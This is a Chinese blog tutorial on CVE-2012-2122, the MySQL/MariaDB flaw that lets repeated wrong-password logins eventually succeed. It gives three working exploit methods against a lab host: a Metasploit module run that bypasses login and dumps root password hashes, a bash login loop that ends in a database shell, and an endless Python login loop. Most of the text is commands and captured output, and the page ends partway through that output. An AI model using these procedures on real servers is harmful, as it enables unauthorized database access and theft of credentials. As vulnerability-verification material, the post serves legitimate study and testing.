zoukankan      html  css  js  c++  java
  • CVE-2012-2122-Mysql身份认证漏洞及利用

    一、漏洞简介

    当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。

    受影响的产品:

    All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
    MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
    MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

    二、漏洞危害

    只要知道用户名,不断尝试就能够直接登入SQL数据库。

    三、漏洞验证

     1、metasploit

    msf > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump 
    msf auxiliary(mysql_authbypass_hashdump) > info 
    
           Name: MySQL Authentication Bypass Password Dump
         Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
        License: Metasploit Framework License (BSD)
           Rank: Normal
      Disclosed: 2012-06-09
    
    Provided by:
      theLightCosine <theLightCosine@metasploit.com>
      jcran <jcran@metasploit.com>
    
    Basic options:
      Name      Current Setting  Required  Description
      ----      ---------------  --------  -----------
      RHOSTS                     yes       The target address range or CIDR identifier
      RPORT     3306             yes       The target port (TCP)
      THREADS   1                yes       The number of concurrent threads
      USERNAME  root             yes       The username to authenticate as
    
    Description:
      This module exploits a password bypass vulnerability in MySQL in 
      order to extract the usernames and encrypted password hashes from a 
      MySQL server. These hashes are stored as loot for later cracking.
    
    References:
      https://cvedetails.com/cve/CVE-2012-2122/
      OSVDB (82804)
      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    
    msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 192.168.118.130
    RHOSTS => 192.168.118.130
    msf auxiliary(mysql_authbypass_hashdump) > run 
    
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 The server allows logins, proceeding with bypass test
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 10% complete
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 20% complete
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully bypassed authentication after 207 attempts. URI: mysql://root:iTk@192.168.118.130:3306
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    [*] 192.168.118.130:3306  - 192.168.118.130:3306 Hash Table has been saved: /root/.msf4/loot/20180829155507_default_192.168.118.130_mysql.hashes_835663.txt
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(mysql_authbypass_hashdump) > 
    

     2、Linux shell

    root@kali:~# for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.118.130  ; done
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    Welcome to the MariaDB monitor.  Commands end with ; or g.
    Your MySQL connection id is 1513
    Server version: 5.5.23 Source distribution
    
    Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
    
    Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
    
    MySQL [(none)]> 
    MySQL [(none)]> select version();
    +-----------+
    | version() |
    +-----------+
    | 5.5.23    |
    +-----------+
    1 row in set (0.00 sec)
    
    MySQL [(none)]> 
    

     3、Python

    主要调用了subprocess.Popen执行shell命令:

    #!/usr/bin/python
    import subprocess
    
    while 1:
            subprocess.Popen("mysql -h 192.168.118.130 -u root mysql --password=blah", shell=True).wait()
    

    具体执行过程:

    root@kali:~# python test.py 
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
